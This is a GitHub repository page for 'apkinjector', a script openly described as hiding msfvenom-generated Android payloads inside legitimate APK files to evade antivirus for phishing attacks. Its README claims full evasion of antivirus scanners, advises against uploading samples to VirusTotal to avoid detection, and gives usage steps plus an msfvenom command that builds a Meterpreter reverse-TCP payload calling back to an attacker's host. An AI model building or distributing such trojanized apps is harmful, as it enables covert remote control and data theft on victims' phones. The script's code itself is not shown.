Skip to content

Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks.

Notifications You must be signed in to change notification settings

jbreed/apkinjector

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

38 Commits
 
 
 
 

Repository files navigation

apkinjector

This script is no longer supported. Please use APKWash.



Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks.

-- Please do not upload "injected" files to VirusTotal.com --


Success Rate:
-100% AV Evasion to date (0/35 on nodistribute, confirmed on AVG and Kaspersky mobile)
-~70% automatic injection
-May require user input, or manually adding the invoke command. The output will explain what is needed.
-If APKTool fails to decompile, or compile, then the injection will fail. On major apps like Facebook, Starbucks, etc you may find this to happen.


Setup:
chmod +x apkinjector
mv apkinjector /usr/local/bin/.

On first run:
-Downloads and places apktool.jar in the user's /usr/local/bin directory
-Generates debug keystore for signing. Places it in ~/.android/
NOTE: If wanting to customize each signature, then remove the keystore before running the script.

Usage:
apkinjector <payload>.apk <original>.apk

Input:
This script takes a msfgenerated payload as input along with an .apk you want to inject into.
To generate the payload: msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o <payload>.apk

Output:
injected_<original>.apk

Debugging
Comment out the removal of the /tmp/payload and /tmp/original directories to see the file structure that was compiled.

About

Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages